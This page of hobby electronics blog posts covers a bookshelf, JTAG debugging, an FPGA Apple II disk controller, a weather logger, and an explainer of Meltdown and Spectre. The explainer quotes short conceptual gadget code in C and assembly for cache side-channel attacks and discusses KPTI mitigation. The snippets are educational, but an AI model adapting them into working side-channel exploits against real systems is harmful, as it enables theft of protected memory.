BMOW title
Floppy Emu banner

What’s on the BMOW Bookshelf

Over the decades, I’ve pared my collection of books down to just four shelves – only about 100 volumes from a lifetime of reading and studying. Because who needs physical books in an age where everything is available online? The few books that remain in my collection have survived a relentless process of repeated culling, until only the most meaningful and valuable ones remain. Want to take a peek? Here are some selections from the shelves.

Computation Structures, by Ward and Halstead. This was my original digital electronics textbook, covering everything from the transistor to CPU design, and is the only one of my bazillion university textbooks to have survived the cull. This book and MIT’s 6.004 class are what first got me excited about building with electronics. The book is a bit dated now: for something more up-to-date, maybe try Horowitz and Hill instead.

At the end of Computation Structures are schematics and control software for a DIY 8-bit computer called the MAYBE, from which I liberally borrowed ideas for my BMOW 1 computer. I built the MAYBE on a giant breadboard in a suitcase, chip by chip and wire by wire, over a semester-long class.

Practical Electronics for Inventors, by Scherz and Monk. This is a great reference for all those electronics details I should have learned, but didn’t. It puts an emphasis on practical engineering applications, with just enough theory to make sense of it all. When I find myself staring at some Forrest Mims schematic or other inscrutable circuit full of bipolar transistors and passives with unknown purpose, this book is a helpful deciphering aid.

The Black Art of Video Game Console Design, by André LaMothe. Ignore the slightly misleading title. This book is a great how-to guide for designing and building digital electronics projects of all types, with a particular emphasis on microcontroller projects. It covers analog and digital theory, circuit analysis, prototyping techniques, computer architecture, video synthesis, relevant tools, and more. If I could only have a single reference book for all my BMOW projects, this would probably be it.

FPGA Prototyping with Verilog Examples, by Pong P. Chu. For anyone that’s interested in building things with FPGAs or CPLDs, but finds it hard to get past the phase of blinking an LED, check out this book. Verilog can be a difficult language for someone coming from procedural languages like C++. It looks superficially similar, but is actually radically different, with every line of “code” running in parallel. This book goes beyond the Hello World stuff, and provides well-explained examples like a digital stopwatch, a soft UART, PS/2 keyboard IO, and a memory controller. There’s also a VHDL version of this book by the same author, if you prefer that to Verilog.

Macintosh Repair and Upgrade Secrets, by Larry Pina. This book is the bible for vintage Mac collectors. It’s long out of print, but I managed to snag an old copy from eBay. Does you Mac Plus make a “flupping” sound and refuse to turn on? Got an original Mac 128K with floppy drive problems, or video that’s reduced to a single horizontal line? Larry explains how to fix it, pointing to exactly which components need testing and replacement. These were the good old days when hackers could fix their busted motherboard by replacing transistor Q5 with a Radio Shack soldering iron, instead of making an appointment at the Genius Bar.

The New Apple II User’s Guide, by David Finnigan. Unlike Macintosh Repair and Upgrade Secrets, Finnigan’s Apple II bible was published in 2012 and is therefore relatively up to date. It covers all the common repairs for the Apple II family, as well as lots of reference material for collectors who may not have grown up with an Apple II, or forgotten what CALL -151 does. What’s better, it also discusses many of the challenges and options for using an Apple II computer in the 21st century. These include how to get your Apple II on the internet, solid state floppy disk alternatives, archiving tools, and the like.

Web Database Applications with PHP and MySQL. This book is essentially “how to build an interactive web site for dummies” using 2004 technology, so it’s dated now, but I still refer to it occasionally. Even for someone with no plans to build a web site, it’s a good introduction to the concepts of how web sites work under the hood. The book describes the ever-popular LAMP stack (Linux, Apache, MySQL, PHP) used to build the front-end and back-end of web applications. Using the skills learned from this book, augmented with more online learning, I’ve built about a dozen different web sites over the years.

Reversing: Secrets of Reverse Engineering, by Eldad Eilam. This is a fascinating look at how software programs are put together, and how they can be pulled apart and modified. I’m not aware of any other books like this one, which makes it that much more entertaining. Reverse engineering sometimes gets a bad reputation, and some people believe it’s only relevant for defeating copy-protection or other morally questionable purposes. The author introduces other uses, such as dissecting and analyzing malware, or understanding software that lacks source code and documentation. For anyone who enjoyed my post about what happens before main(), or my quest to create the smallest possible Windows executable, I recommend checking out this book.

Compute! Magazine, January 1985. This is the only remaining example of my once-mighty collection of computer magazines. There’s no special significance to this particular issue, other than that it was the only one to escape the recycling bin. It’s always amusing to browse. Loading software from cassette tape? Compuserve ads? And who didn’t love typing in those 20-page long BASIC program listings?

Flatland, by Edwin A. Abbott. This classic 1884 science fiction “romance of many dimensions” will blow your mind in just 92 pages. Imagine you’re a three-dimensional being attempting to explain things to inhabitants of Flatland, a 2D world. Imagine those Flatlanders attempting to explain their world to the miserable inhabitants of 1D Lineland. Now ponder the implications for our own three-dimensional existence: is it any more real than Flatland or Lineland? Where are the 4D visitors to Earth, and what might they look like? It’s a fantastic thought experiment, and the side-plot satire of Victorian society values is a hilarious bonus.

The Monopoly Companion, by Philip Orbanes. If you thought Monopoly was just a silly game for kids, you’re wrong. Back in my university days, my group of friends played many hundreds of Monopoly rounds, arguing strenuously over trading and strategy. A good friend was the Massachusetts champion one year, and represented the state at the National Monopoly Championships held in Atlantic City. The book describes general strategies like a preference for certain color groups (orange is best), and the importance of building to the three house level. We created a detailed software simulation accounting for all board squares, rents, cards, and dice roll probabilities, and ran it millions of times to determine the best strategy. Then we sent a letter to this book’s author, disputing some of his conclusions. God, what a bunch of nerds we were.

Your Money or Your Life, by Dominguez and Robin. We all spend a tremendous amount of time and energy in the attempt to accumulate money, sometimes without really considering why. Yes we need a safe place to live, food to eat, and other necessities – but what then? The money itself won’t bring happiness. Have we really thought about exactly what will bring happiness? How much of our life’s energy are we willing to trade away for those things? Having identified them, might there be other ways to get similar things that require less or no money? Can money even buy them at all? Your Money or Your Life helps guide readers towards a future where they may not be rich in dollars, but are rich in the things they value most.

Finding Your Own North Star, by Martha Beck. Where are we headed? Why? What’s important to our essential self? Like other self-help books or the time-honored What Color is Your Parachute, this book aims to help identify paths that are best-aligned with one’s values. It resonated with me in a way that other similar books didn’t. One clever exercise was to get everybody on your side, by intentionally redefining who “everyone” is. Another was an invitation to envision the best possible personal future imaginable, and map it out. The act of defining a goal already brings it closer.

The Goldfinch, by Donna Tartt. A friend and I read this Pulitzer Prize winning novel at the same time. She thought it was just OK. I thought it was outstanding. It was one of those books that when you finish, you set it gently in your lap and just stare vacantly into space for a long while, trying to digest it all. Tartt’s prose is rich and evocative like a master painting, and her story of loss and disaffection is heartbreaking. But what really moved me was the portrayal of the awkward intimacy of adolescent male friendships, the things said and unsaid but understood, the struggle to carry those relationships into adulthood. I felt Tartt had snooped inside my mind and extracted feelings I didn’t even know were there.

A family bible from 1817. Not many artifacts survived the past two centuries with my family, but this one did. It’s a huge volume with an imposing leather cover, and on the inside leaf are inscribed the births and deaths of generations.

“Joshua Ladd was born 1st mo. 7 1817”. That’s January 7 to us, so Joshua just had his 201st birthday recently. He was my great-great-great-great-grandfather, a farmer originally from Virginia who at age 14 moved to Ohio with his mother and siblings after the death of their father. Ohio had just become a state, and the family moved in search of new opportunities. Joshua opened a grocery and supply store in the town of Westville, near Damascus OH. I still have the wedding gloves of Joshua’s daughter Sarah tucked safely in a box. Any Ladds in your family tree? Maybe we’re related.

Essays by Ralph Waldo Emerson. This particular volume is from 1883, and was passed down through generations to my father and then me. Sometimes I think those Transcendentalist authors like Emerson, Longfellow, and Thoreau had everything figured out in 1870, and we haven’t accomplished much since. “When you were born you were crying and everyone else was smiling. Live your life so at the end, you’re the one who is smiling and everyone else is crying.”

Read 2 comments and join the conversation 

Yellowstone JTAG Debugging

After a month of inactivity, I finally returned to my unfinished Yellowstone disk controller project to investigate the JTAG programming problems. Yellowstone is an FPGA-based disk controller card for the Apple II family, that aims to emulate a Liron disk controller or other models of vintage disk controller. It’s still a work in progress.

Last month I discovered some JTAG problems. With the Yellowstone card naked on my desk, and powered from an external 5V supply, JTAG programming works fine. I can program the FPGA to blink an on-board LED. And when I insert the already-programmed card into my Apple IIe and power it from the slot, it works – the LED blinks. But if I try to do JTAG programming while the card is inserted in the IIe, it always fails with a communication error. I’ve run through several theories why:

  • It might be some kind of noise or poor signal integrity on the JTAG traces. But the traces are quite short and don’t cross any other signal traces that might carry interfering signals.
  • Maybe I have power problems, and the IIe’s 5V supply is drooping briefly when I try to program the FPGA via JTAG. But I measured the 5V and 3.3V supply voltages during JTAG programming, and they look fine.
  • There might be a ground loop, due to the Apple IIe and JTAG programming having different ground potentials. But I measured the difference in grounds, and it’s only 4.3 millivolts.

To help solve this mystery, I used the analog mode of my Saleae Pro 8 Logic analyzer. In analog mode, it functions like a simple 8-channel 12.5 Ms/sec oscilloscope. I recorded the 3.3V supply for the FPGA, as well as all the JTAG signals. First, here’s what the first three seconds of JTAG traffic look like when programmed externally:

There’s about 1 second of preamble communication, and the rest is the FPGA configuration data arriving at high speed. The 3.3V supply for the FPGA remains at about 3.28V through the whole process. The JTAG signals TMS, TDI, and TDO span the voltage range from 0.17V to 3.2V, which seems fine. But the the TCK signal never goes higher than 1.86V. Uh oh, what’s happening there? Let’s zoom in a little:

Zooming in, things are even worse than they appeared initially. TCK never climbs above 1.86V, but many TCK pulses only get half that high, stopping at 0.97V. TMS and TDI show some runts too. Zooming in even further on one of the problem areas:

Here you can see a couple of the 1.86V TCK pulses, followed by a whole mess of the runtier 0.97V pulses. Ugh. These should all be using the full range 0 to 3.3V, or something close to it. With a clock signal this bad, it’s amazing the JTAG programming still works.

Do these graphs really reflect what’s happening? I’m a little suspicious that I’m running into limitations of the Saleae Pro 8’s analog mode. At 12.5 Ms/sec, it’s taking one analog sample every 0.08 microseconds or 80 nanoseconds. That’s pretty poor as scopes go, but the period of the JTAG clock is slow: about 1 microsecond (1 MHz operation). There should be 12.5 samples per clock period, more than enough to get a decent reading for the min and max voltage of each clock period. Therefore I think the graphs are accurate.

My conclusion is that although external JTAG program succeeds, the JTAG signals look terrible. The fact that JTAG programming fails when the card is in the Apple IIe slot likely has little to do with the IIe, and everything to do with some other basic signal quality problem.

Next I put the Yellowstone card into the Apple IIe, and repeated my test. Here’s the first three seconds of JTAG traffic again:

There’s a short bit of preamble communication, then nothing. Something must go wrong at the beginning, and the rest of the communication is aborted. The voltage levels all look about the same as when programming externally. The 3.3V supply is about 3.28V, TCK never goes higher than 1.86V, but the other JTAG signals use the full voltage range. Zooming in, we observe the same extra-runty TCK pulses as with external JTAG programming:

It’s not obvious to me why external JTAG programming succeeds, but programming in the Apple IIe slot fails. Both cases look equally bad. The only real difference I noticed is the TDO signal. In the case of external programming, the TDO high voltage is very steady at about 3.268 volts, and never varies by more than 0.01V. It also drops low at many points during the JTAG communication. But in the case of in-slot programming, the TDO signal is always high and the voltage is noisier. It’s a subtle difference, but you can see the minor noise here:

The TDO high voltage ranges from 3.187V to 3.314V, so it’s about 10x noisier than during external programming. It’s still within an acceptable range though, so maybe this isn’t important.

 
Finding the Culprit

Now that I know I have poor quality JTAG signals, where do I look for the cause? Poor quality JTAG programmer? Bad PCB design? Here’s a section of the PCB, showing the path of the JTAG signals from the connector to the FPGA:

There’s not much opportunity for interference. The only PCB tracks that are crossed by the JTAG signals are voltage supplies and the disk I/O signals, which were unconnected during this test.

The prime suspect is R3, a 4.7K pulldown resistor on TCK. This was recommended by Lattice, as a precaution to prevent spurious TCK pulses causing unwanted JTAG activity when no JTAG programmer is present. Lattice technote TN1208 for the MachXO2 family says on page 12-2 “TCK: Recommended 4.7kOhm pull down.” The other JTAG signals discussed here all have internal pull-ups. 4.7K isn’t much, but maybe the JTAG programmer has an anemic drive strength and is unable to drive TCK fully to 3.3V with the pulldown present? I could try removing R3, but that wouldn’t explain why there are also some runt pulses seen on TMS and TDI. I double-checked to confirm I didn’t accidentally use the wrong value resistor for R3, but no: it’s 4.7K as intended. I also measured the resistance between TCK and GND, to see if there’s some other unintended low-resistance path to GND that’s screwing up everything, but it measured 4.7K exactly.

Read 19 comments and join the conversation 

Meltdown and Spectre Vulnerabilities Explained

This week brought some fascinating news for CPU nerds: the revelation of security vulnerabilities in the basic hardware architecture of many modern processors. The Meltdown and Spectre vulnerabilities affect virtually all modern computers, according to a sensationalist headline at The Register which called them the “worst ever” CPU bugs. Unlike bugs in a specific software program or operating system that can be fixed with a patch, these are fundamental flaws in the very design of the CPU.

What are these vulnerabilities exactly, how do they work, and how are Meltdown and Spectre different from each other? I must have read twenty different news stories without finding a clear answer. The best I could get was that these vulnerabilities somehow involve the CPU’s use of speculative execution: an optimization trick that executes code before it’s known whether the code should really be executed, discarding the results if it’s later determined that the code wasn’t needed. But as a guy who designs custom CPUs as a hobby, I needed a better answer than that. So I started poking beyond the news headlines into the gory tech details.

What follows below is my attempt to explain Meltdown and Spectre to myself, and by extension to readers of this blog. It assumes readers already have some basic knowledge of concepts like CPU internals, caches, and operating systems. But moreso than normal for this blog, I’ll be discussing details that I don’t fully understand myself, and my explanations may be flawed. If you find an error or omission, kindly post a comment and let me know.

 
Speculative Execution + Caching = Vulnerability

Both Meltdown and Spectre exploit the fact that speculatively executed code can modify the CPU cache. Even if the code is never “really” executed, meaning that it never modifies CPU registers or memory or other processor state, the cache effects of the speculatively executed code can be observed by cleverly-constructed code that follows it, by testing what is and isn’t cached. Consider this example, taken from Google’s Project Zero Blog:

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}

If arr1->length is not presently in the cache, the CPU won’t immediately know whether the if clause will evaluate true or false. If it guesses true, then the if body will execute speculatively while arr1->length is fetched from main memory. Speculative execution will cause arr1->data[untrusted_offset_from_caller] to be loaded from main memory into the cache. This behavior can be leveraged in several different ways (see below) to gain information about protected regions of memory that are supposed to be private: memory owned by other processes or the kernel. The ability to observe protected memory makes it possible to read passwords, Bitcoin keys, emails, or other sensitive information.

 
Spectre: Speculative Execution in Branch Prediction

The Spectre vulnerability requires getting the victim (the kernel or another process) to run specially-constructed code, which then leaks information through the cache effects of speculative execution. Consider an expanded version of the previous example.

struct array {
struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}

If arr1->length is not currently in the cache, speculative execution will continue inside the body of the if clause. Either arr2->data[0x200] or arr2->data[0x300] will be fetched from main memory and cached, depending on the least significant bit of arr1->data[untrusted_offset_from_caller]. After the speculative execution has ended, the attacking user mode code can measure how much time is required to load arr2->data[0x200] and arr2->data[0x300]. Whichever one was cached will load faster, revealing whether the LSB of arr1->data[untrusted_offset_from_caller] is 0 or 1. By repeating this process with other bit masks, the attacker can eventually read all of arr1->data[untrusted_offset_from_caller]. And by the choice of untrusted_offset_from_caller, the attacker can read any memory location.

That’s the general idea. Some implementation details and optimization methods are described in the Project Zero blog. The blog also describes another Spectre variant exploiting speculative execution through indirect branches, which I didn’t examine.

How can a user process get the kernel to run this kind of specially-constructed code? It turns out that the Linux kernel has a feature called eBPF that’s designed for this exact purpose, presumably to allow for device drivers or socket filters or other snippets of user-provided code that need to run in the kernel. I’m assuming Windows and Mac OS have something similar. Since running arbitrary user-provided code in the kernel would be a huge security vulnerability itself, eBPF actually runs the code in an interpreter or a JIT engine. But that’s enough to exploit this vulnerability.

Note: after writing this post, I found a second explanation of Spectre from a group of academic researchers working independently from Google Project Zero. Their paper describes Spectre slightly differently, and discusses attacking other processes rather than the kernel. It also includes a proof of concept Javascript attack, in which a malicious bit of Javascript is able to read private memory from the web browser process. Relying on the fact that Javascript is typically JIT compiled to native code, and using debug tools to examine the native output, the authors were able to iteratively tweak the Javascript source code until it produced native code containing an exploitable conditional branch of the kind shown above.

Spectre affects essentially all modern CPUs, given the proper conditions: Intel, AMD, ARM, etc.

 
Meltdown: Exploiting Out of Order Execution

Meltdown is similar to Spectre, in that they both leak information through the cache from instructions that were never “really” executed. However, with Meltdown there’s no branching involved. The attack relies on the way modern CPUs optimize performance by employing out of order instruction execution. Due to the availability of CPU execution units and dependent data, instructions are sometimes executed in a different order than they appear in a program, but they are retired (registers and state are updated) in order. The fact that they were executed out of order should be invisible to the program, but Meltdown shows that’s not always true. The details are described at cyber.wtf and in a separate academic paper.

When instructions are executed out of order, but aren’t yet retired, their results exist in a kind of limbo that’s very similar to speculatively executed code from branch prediction. However, it’s not clear whether this should properly be called speculative execution. The Meltdown paper refers to these as “transient instructions”, which seems like a good term.

Consider this code:

mov rax, [someKernelAddress]
and rax, 1
mov rbx,[rax+someUserModeAddress]

The first instruction should cause an exception if executed from a user mode process, because it’s an attempt to access kernel memory. However, at least on Intel architectures, it appears that the exception doesn’t occur until the instruction is actually retired. If this code is executing as part of a transient instruction sequence, no exception will yet occur, the privilege violation (bypassing kernel memory protection) will be ignored, and the transient read will succeed. The following transient instructions that use the read value will also succeed, and will affect the cache state in the same way as Spectre, creating a side-channel for leaking information about kernel memory.

Eventually, the first instruction will be retired and the exception will occur. The state changes related to the following instructions will be discarded, because those instructions were never really executed, but their cache side effects will remain. After an exception handler resolves the exception, further code can measure how long it takes to load from address someUserModeAddress vs someUserModeAddress+1, thereby inferring the LSB of someKernelAddress. Further iterations can read the other bits.

To ensure that the Meltdown code sequence executes as an out-of-order transient sequence, the cyber.wtf technique includes a long series of filler instructions ahead of it. These filler instructions all use a different execution unit than the units needed by the Meltdown sequence, and create a long chain of interdependent instructions. So the CPU must sequentially execute the filler instructions one at a time, but meanwhile it can also jump ahead and execute the Meltdown instructions out of order.

Note that “out of order” here refers to the Meltdown code being executed out of order relative to the filler instructions. The Meltdown instructions themselves are executed in order relative to each other, since each one is dependent on the previous one.

At this time, Meltdown appears to be limited to Intel CPUs only. It’s uncertain whether this is due to a fundamental difference in how Intel handles memory protection with respect to out-of-order execution, or is simply due to differences in the size of the reorder buffer between CPU vendors. In a short aside on Meltdown, the Spectre paper states “Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.” However, the Meltdown paper reports that the authors were able to observe bypassing of memory protection during out of order execution on ARM and AMD processors too, but were unable to construct a working exploit.

 
Impact and Mitigation

Both of these vulnerabilities are very bad, enabling user mode code to read other protected memory. However, they’re both local exploits: the attacking code must be running on the machine being attacked, so an attacker must somehow get their code onto your machine first. For this reason, the greatest risk is probably to cloud computing environments, where processes from many different people are running on the same machine, supposedly isolated from one another thanks to memory protection. But there’s also a risk in any situation where one computer runs code received from another, even inside a VM or sandbox.

It’s not clear how Spectre can be fixed in software, because it relies on CPU features that are fundamental to all modern processors. In fact, I don’t think it can be fixed in software – at least not in any general way. One web site says, “as Spectre is not easy to fix, it will haunt us for a long time.” The only good news is that convincing the kernel to run an attacker’s special code with eBPF or other methods isn’t easy. And web browsers can be patched to protect against the sort of Javascript Spectre attacks described in the research paper. But other opportunities for Spectre attacks will remain. Future CPUs may contain hardware fixes for Spectre, but they’ll likely come with a complexity and performance penalty. Maybe cache lines will have to be treated as process-specific data instead of as shared resources.

Meltdown is the more serious of these two vulnerabilities, because it happens entirely in a single user space program and doesn’t require any special code in the victim process or kernel. In the real world, this makes it much easier for an attacker to exploit. Fortunately Meltdown can be fixed at the operating system level, but the fix carries a performance penalty that may be as high as 30%.

In the Meltdown sample code, readers may have wondered how an instruction like mov rax, [someKernelAddress] could possibly work in user mode code, even speculatively, since the kernel uses a different virtual to physical address mapping than the user mode process. It turns out that Linux (and I assume other operating systems too) maps the kernel’s memory into the address space of every user process, for performance reasons. By keeping the kernel permanently mapped, there’s no need to flush the TLB when switching between user and kernel space, and TLB entries for kernel space never need to be flushed. The processor’s MMU can normally be trusted to prevent user processes from accessing this kernel memory – except in the case we’ve just seen. The details are nicely explained in the description of a related technology named KAISER.

The “fix” is KPTI: kernel page table isolation. This ends the longstanding practice of mapping kernel memory into the address space of user processes. This ensures that mov rax, [someKernelAddress] won’t be able to reveal any information. However, it means that the TLB must be flushed every time there’s a switch between user and kernel code. If a user process makes frequent kernel calls, the constant TLB flushing will be expensive and have a significant negative performance impact.

 
The Future

Meltdown and Spectre are scary, not only because of what they can do themselves, but because they introduce a Pandora’s Box of new vulnerability types we’re sure to see more of in the future. We can no longer think about security analysis as something that gets applied to specific software programs or operating systems, examining the code and imagining it being executed instruction by instruction in an abstract environment. We must now consider the specific highly complex CPU (often not fully documented) that runs this software, and understand the many subtle ways in which the true hardware behavior differs from the instruction-by-instruction conceptual model.

The KAISER document mentions techniques like exploiting timing differences in fault handling, observing the behavior of prefetch instructions, and forcing faults using the Intel TSX (transactional memory) instructions. This will be a new frontier for most developers, forcing them to peel back a layer of abstraction when evaluating future computer security issues. The world just got a lot more complicated.

Read 4 comments and join the conversation 

FPGA-Based Disk Controller for Apple II

Apple II disk controller cards are weird, there are a crazy number of different types, and many are rare and expensive. Can an FPGA-based solution save the day for retro collectors? You bet! Nearly all the existing disk controllers connect the same 8-bit bus to the same 19-pin disk interface, so a universal clone is merely a question of replacing the vintage 80s guts of the card with a modern reprogrammable FPGA. This hypothetical universal controller card could connect to almost any Apple II disk drive, or a Floppy Emu. Here’s my first attempt.

 
An Idea Takes Root

This project has been nearly finished since August, but I’d hoped to delay announcing it until it was 100% done. Back in July there was a surge of interest in the Liron disk controller, when I updated the Floppy Emu firmware to add Liron support. For the first time, it was now possible to emulate a 32 MB Smartport disk on an Apple II, II+, or IIe with the Floppy Emu. But only Liron card owners could benefit, and the Liron card is fairly obscure and difficult to find. People started asking about the possibility of a Liron clone card, so I went to work.

Mapping out the complete schematic of the Liron took a couple of days. It’s a single IWM (the famous Integrated Wozniak Machine), combined with a small number of standard 7400-series logic chips, and a ROM to hold the boot code. Writing Verilog code for the FPGA to duplicate the 7400 chips’ functions was easy. Creating a Verilog reimplementation of the IWM was harder, but with the aid of the IWM spec and a logic analyzer I got it done. By selecting a moderately roomy FPGA, I was able to incorporate the boot ROM functionality too, so no actual ROM chips are needed. The entire design boiled down to some 3.3V level converters and a single FPGA, with a bunch of connectors and passive components. I realized the design wasn’t limited to being a Liron clone, but could also probably be a Disk 5.25 or Disk 3.5 controller with just a change of firmware. Maybe even a UDC controller. Ooh, the possibilities!

 
Hardware

I worked like mad to finish the design in late July, just before a trip to Yellowstone National Park, which gave this project its codename. The core of the prototype board is a Lattice MachXO2 FPGA, specifically the LCMXO2-1200HC. This 100-pin bad boy has 1280 LUTs for implementing logic, and 8 KB of embedded block RAM to serve as the boot ROM or for other functions. It also has some nice features like a built-in PLL oscillator and integrated programmable pull-up and pull-down resistors. Unlike some FPGAs, the MachXO2 family also has built-in flash memory to store the FPGA configuration, so it doesn’t need to be reloaded from an external source at power-up. The FPGA can be programmed through a JTAG header on the card.

The external disk is connected to the card with a standard 20-pin ribbon cable, just like what you’d find inside an Apple IIc, or on the Floppy Emu. In fact for the Floppy Emu, you can connect a 20-pin ribbon cable directly from the Emu to the FPGA card, with no DB-19 required. For other external disk drives, I built a small adapter that converts a short length of 20-pin ribbon cable to a DB-19 female connector.

Because the FPGA’s maximum supported I/O voltage is 3.3V, but the Apple II has a 5V bus, some level conversion is needed. I used four 74LVC245 chips as bus drivers. These chips operate at 3.3V but are fully 5V tolerant, and the Apple II happily accepts their 3.3V output as a valid logic “high”. One of the chips operates bidirectionally on the data bus, and the others handle the unidirectional address bus and control signals.

There’s a tiny 3.3V voltage regular on the board, which you can see at the lower-right at U3. It’s barely any bigger than a 0805 size SMD capacitor. Even with these small components, I was still able to solder the entire prototype board myself by hand.

Just for grins I added a 2 MB serial EEPROM to the board, which you can see at U2. 2 MB is enough to store 14 disk images of 5.25 inch disks, or a single larger disk image. It’s not central to the design, but if it works then the card could function as an all-in-one virtual disk like the CFFA3000, in addition to functioning as a disk controller for external drives. More options!

 
Status

Here comes the embarrassing part. After July’s spurt of activity, the PCBs and parts arrived in the mail. And then I did…. nothing. Finally in October I assembled one prototype board, stuck it in my Apple IIe, and played with it for a bit. But since that day I’ve done…. nothing. I’m struggling with some internal dilemma about the balance between a hobby and a business, and doing things because I want to or because I think I should want to. I’m hoping that by publishing this summary, I may spur myself into further action.

The prototype board works as far as I’ve tested it, but that’s not very far. I verified that I can program the FPGA via JTAG, and that it responds to address and data on the Apple II bus, but that’s about it. I haven’t yet looked at what it’s doing on the external disk interface, or tried connecting a real drive. My attention has just been focused on other things, and even though I always mean to return to this project “soon”, somehow I never do.

There’s at least one serious bug with JTAG programming that needs to be addressed. When the board is outside the Apple IIe and powered from a separate 5V supply, JTAG programming works fine. But when the board is actually inserted in the IIe and powered from the slot, JTAG programming doesn’t work. It always fails with a communication error. I thought this might be some kind of noise or poor signal integrity on the JTAG traces when the board is in the IIe, but the traces are quite short and don’t cross any other signal traces that might carry interfering signals. I also thought maybe I had power problems, and the IIe’s 5V supply was drooping briefly when I tried to program the FPGA via JTAG. But as far as I can tell with a logic analyzer’s analog functions, the 5V and 3.3V supplies remain stable. It’s a mystery that will require some better tools and more careful testing.

 
Next Steps

What’s next for this FPGA disk controller, assuming I ever finish it? Will it become a new product in the BMOW store? That was certainly my original plan, although my lack of motivation these past months has cast some doubt on that idea. I want to keep fun hobbies fun, and not have them become an obligation and a chore, which I fear is already happening with the other retro computer gizmos I’ve developed in the past few years. We’ll see how it plays out.

Assuming this eventually becomes a new product, how will users reprogram the FPGA in order to clone a different type of disk controller? It’s not reasonable to expect that everyone will own a stand-alone JTAG programmer and know how to use it. Unfortunately I can’t see any alternative solution that wouldn’t require extra hardware and complexity, and push up the cost of the board. I might add a microcontroller and an SD card socket for loading alternate firmware, but that would be a fairly ridiculous amount of extra baggage if it were used only for JTAG. Perhaps the Apple II itself could be used as a JTAG programmer, with some extra hardware that optionally bridged the data bus to the JTAG interface? Sounds complicated, and it would leave the question of how to get the firmware onto the Apple II first. Or maybe the user could choose between a few different built-in firmwares using a switch, but would be unable to load new ones? That sounds more plausible, but would mean a bug in the firmware couldn’t be easily fixed.

Fortunately those questions can wait. The first priority is to finish debugging the prototype, connect it to some real disk drives, and verify that it works. Maybe by Christmas…

Read 31 comments and join the conversation 

Weather Logger with Losant and Amazon Alexa

Like a million other people on the Internet, I’ve been experimenting with home weather logging. I roll my eyes at the phrase “Internet of Things”, but it’s hard to deny the potential of cheap networked sensors and switches, and a weather logging system is like this field’s Hello World application. Back in June I posted about my initial experiments in ESP8266 weather logging. Since then I’ve finalized the hardware setup, installed multiple nodes around the house, organized a nice web page to analyze all the data, and integrated everything with Amazon Alexa. Time for an update.

Hardware

I’ve placed four sensor nodes around the house. At the heart of each one is a Wemos D1 Mini, a $4 Arduino-compatible ESP8266 microcontroller board with built-in WiFi. A Wemos OLED shield is used to display live stats at each node, and a Wemos SHT30 sensor shield collects temperature and humidity data.

My original prototype stacked the three modules on top of each other, but I found that this configuration caused the heat from the Wemos D1 Mini to skew the temperature readings from the SHT30 sensor. The final hardware setup uses a Wemos tripler base to mount the three modules side-by-side. The module is powered by a standard USB cable connected to a power adapter scavenged from some other long-forgotten device. The total hardware cost for the entire node is about $10, which seems amazingly inexpensive.

Three of the nodes are indoors. The fourth is outside on a patio, plugged into an outdoor electric outlet and protected from the elements by a sheet of cardboard. This node doesn’t have any OLED display (nobody is there to see it), and it uses a BMP085 sensor that measures temperature and air pressure instead of temperature and humidity. The outdoor node is unfortunately prone to crazy temperature readings when the direct sun hits its cardboard shield. The cardboard quickly warms in the sunlight, creating an oven effect that boosts the temperature readings to over 100 F, even when there are many holes in the cardboard to encourage airflow. I need to design a better enclosure for the outdoor sensor that’s not as sensitive to the sun.

This hardware setup works nicely where WiFi and electric outlets are easily available. For sensor nodes “in the field” outside WiFi range and requiring battery power, something like a Moteino may be more appropriate.

Software

The software running on each node is very simple: it’s little more than a combination of standard Arduino libraries for each of the modules. There are standard libraries for the SHT30 and BMP085 sensors, for the Wemos D1 Mini’s built-in WiFi, for the OLED display, and for the Losant data logging service. For anyone who’s done much Arduino programming, the glue code that’s needed to tie everything together is simple and can be written in an hour. See my example code.

When first powered on, the node software connects to the local WiFi network using a hard-coded SSID and password. It then connects to the data logging server, as well as an NNTP server to get the current date and time. Once that’s done, it polls the sensor every 15 seconds to get the latest data. The data is displayed on the OLED, and also transmitted to the logging server. Easy peasy.

Logging and Analysis

Displaying live data is nice, but the most interesting part of a weather logger is analyzing the collected data. By examining data over time, and comparing data from multiple nodes, it’s possible to answer burning questions like:

  • When it’s slightly warmer outside than in, will opening the windows cool the house by creating a breeze, or warm the house by admitting warmer air?
  • Does kitchen cooking have a measurable effect on indoor humidity?
  • How slowly or quickly does indoor temperature change in response to outdoor changes?
  • Is it always cooler downstairs than upstairs?
  • What’s the effect of opening specific windows around the house?

After experimenting with many different data logging and display services, I settled on Losant. Their web page looks very business-oriented and intimidating, so I initially thought it would be a poor match for my needs, but I was wrong. The system is easy to use, and is free as long as you don’t have a crazy number of nodes or data records.

Losant powers a custom web dashboard with a mix of graphs and other widgets. The layout, size, and data details are highly configurable, and a single widget can do more than simply displaying the latest sensor reading. For example, it can display the average, min, or max reading from a sensor over a window of time, or compute an aggregate value from several sensors.

My dashboard shows live data from the four nodes, as well as temperature, dewpoint, and atmospheric pressure graphs for the past 24 hours and past 7 days. I learned that downstairs is reliably cooler than upstairs, and that opening those windows really does create a cooling breeze. I found that a person entering a closed room for a few minutes can substantially raise its humidity (all that exhaling). My furnace has a cycle time of 20 minutes, visible in the ripple of the 24 hour temperature graph shown above. The kitchen temperature often shoots up around 4 PM when the afternoon sun comes in the windows. Outdoor low temperature was 51.9 F, reached at 7:15 AM this morning. Saturday’s outdoor low was 41.7 F at 5:40 AM. Lots of interesting stuff.

Amazon Alexa Integration

One of the most interesting features of Losant is its webhook integration. In addition to logging and displaying data, it can also interact with 3rd-party web services. A data update from a sensor node can trigger some related web request, or a web request to Losant’s servers can retrieve stored data, or even trigger a command to the sensors. There are some powerful options, and it’s all configured through a visual programming interface that Losant calls a workflow.

